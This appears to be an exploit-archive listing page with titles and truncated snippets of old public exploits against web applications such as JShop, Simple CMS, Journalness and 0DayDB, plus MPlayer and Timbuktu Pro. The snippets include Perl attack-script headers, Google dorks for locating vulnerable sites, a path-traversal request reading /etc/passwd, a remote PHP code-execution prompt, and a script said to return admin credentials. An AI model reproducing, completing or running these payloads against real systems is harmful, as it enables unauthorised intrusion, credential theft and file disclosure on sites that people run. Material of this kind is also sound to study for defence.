Prozilla Reviews Script 1.0 - Arbitrary Delete User

Prozilla Reviews Script 1.0 - Arbitrary Delete User --==+================================================================================+==-- --==+ Prozilla Reviews Script 1.0 Arbitrary Delete User Vulnerability +==--...

Picture Rating 1.0 Blind SQL Injection Exploit

No description provided by source. !/usr/bin/perl -- Picture Rating 1.0 Blind SQL Injection Exploit -- -Info/Instructions- After running this perl script, you will have admin details therefore you will be able to login to the admin area at http://site.com/control/ ok once you have logged in has...

Prozilla Reviews Script 1.0 Arbitrary Delete User Vulnerability

Exploit for unknown platform in category web applications =============================================================== Prozilla Reviews Script 1.0 Arbitrary Delete User Vulnerability ===============================================================...

Prozilla Reviews Script 1.0 - Arbitrary Delete User

--==+================================================================================+==-- --==+ Prozilla Reviews Script 1.0 Arbitrary Delete User Vulnerability +==-- --==+================================================================================+==-- Discovered By: t0pP8uZz Discovered On: ...

jshop-lfi.txt

JShop 1.x-2.x local file include --------------------------------------------------------------------------------------------------------------------- + scripts: Jshop Server 1.x-2.x + + Discovered By : v0l4arrra + + url: www.jshop.co.uk + + dork: "powered by jshop" and also usefull one...

JShop 1.x 2.x - xPage Local File Inclusion

JShop 1.x 2.x - xPage Local File Inclusion JShop 1.x-2.x local file include --------------------------------------------------------------------------------------------------------------------- + scripts: Jshop Server 1.x-2.x + + Discovered By : v0l4arrra + + url: www.jshop.co.uk + + dork: "power...

JShop 1.x < 2.x - 'xPage' Local File Inclusion

JShop 1.x-2.x local file include --------------------------------------------------------------------------------------------------------------------- + scripts: Jshop Server 1.x-2.x + + Discovered By : v0l4arrra + + url: www.jshop.co.uk + + dork: "powered by jshop" and also usefull one...

MPlayer sdpplin_parse() Array Indexing Buffer Overflow Exploit PoC

No description provided by source. !/usr/bin/perl Huston, mplayer got some vulns! : CVE-2008-0073 also apply to mplayer and vlc with some distinctions. Assuming kernel.varandomize=0 this overwrite EIP with a "stream" structure on my box...

HIS-Webshop - 'his-webshop.pl t' Remote File Disclosure

HIS-Webshop is a shopping-system written in Perl by www.shoppark.de The script doesn´t check the "t"-parameter. Example: http://server.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00 milw0rm.com 2008-03-24...

Motorola Timbuktu Pro <= 8.6.5 File Deletion/Creation Exploit

No description provided by source. !/usr/bin/perl ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO Timbuktu Pro = 8.6.5 Arbitrary File Deletion/Creation Bug & Exploit by titon titonatbastardlabsdotcom Advisory: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=590 Copyright...

Motorola Timbuktu Pro 8.6.5 - File Deletion/Creation

!/usr/bin/perl ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO Timbuktu Pro = 8.6.5 Arbitrary File Deletion/Creation Bug & Exploit by titon titonatbastardlabsdotcom Advisory: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=590 Copyright: c2007 BastardLabs...

Simple CMS <= 1.0.3 (indexen.php area) Remote SQL Injection Exploit

No description provided by source. !/usr/bin/perl Simple CMS = 1.0.3 ?area= Remote SQL Injection Exploit Code by JosS Contact: sys-projectathotmail.com Spanish Hackers Team / Sys - Project http://www.spanish-hackers.com special thanks to ka0x print " "; print " Simple CMS = 1.0.3 Remote SQL...

Affiliate Market Ver.0.1 BETA XSS / SQL Injection Exploit

Exploit for unknown platform in category web applications ========================================================= Affiliate Market Ver.0.1 BETA XSS / SQL Injection Exploit ========================================================= !/usr/bin/perl Affiliate Market Ver.0.1 BETA Multiple Remote...

journalness-exec.txt

!/usr/bin/perl Vendor url: journalness.sourceforge.net note: exploit requires Registerglobals = On in php.ini Iron http://www.randombase.com require LWP::UserAgent; print " Journalness ; if$target ! /^http:/// $target = "http://".$target; if$target ! //$/ $target .= "/"; print "PHP code to...

Journalness <= 4.1 (last_module) Remote Code Execution exploit

Exploit for unknown platform in category web applications ============================================================== Journalness ; if$target ! /^http:/// $target = "http://".$target; if$target ! //$/ $target .= "/"; print "PHP code to evaluate? "; chomp$code=; $code = s/|new; $ua-timeout10;...

connectix-rfi.txt

!/usr/bin/perl Author : HouSSaMix From H-T Team Script : Connectix Boards Tested in last version 0.8.2 & 0.8.1 Bug : Remote File Inclusion Vulnerable Code : Dork : powered by connectix boards Risk : High Download : http://www.connectix-boards.org/ Exploit:...

Xforum 1.4 - &#039;topic&#039; SQL Injection

!/usr/bin/perl Xforum 1.4 Remote SQL Injection desc: Un forum php/MySQL, avec gestion complete des membres et des messages download: http://www.comscripts.com/scripts/php.xforum.1188.html d0rk: "xforum 1.4" bug found by j0j0 c0ded by j0j0 liretopic.php 68. $conn = connect; 69. $requete = "SELECT...

Agares PhpAutoVideo 2.21 (articlecat) Remote SQL Injection Exploit

No description provided by source. !/usr/bin/perl Agares PhpAutoVideo 2.21 articlecat Remote SQL Injection Exploit Bug Found by ka0x http://milw0rm.org/exploits/4901 .. but sql injection works if we include in index.php bug file with sql injection..like this :...

photokron-disclose.txt

!/usr/bin/perl Script : PhotoKron All Version All Version Author : Pr0metheuS Gr33tz to Gr33tz-Team Gr33tz-Team.ORG Dork : "Powered by photokorn" INFO Works IF /update/ is on server...60% site are vulnerable.... INFO use LWP::UserAgent; if @ARGV!=2 print "-=-=-=-=-=-=-=-=-=-=-=--=\n"; print...

0DayDB 2.3 - &#039;id&#039; Remote Authentication Bypass

!/usr/bin/perl Autor : Pr0metheuS Script : 0DayDB v2.3 Version : v2.3 Dork : "Powered By 0DayDB v2.3" Gr33tz-Team.org use LWP::UserAgent; if@ARGV!=3 print "\n"; print "0DayDB v2.3 Remote Admin Bypass\n"; print "perl $0 \n"; print "downloads ID for delete\n"; print "\n"; $site,$path,$id=@ARGV; sub...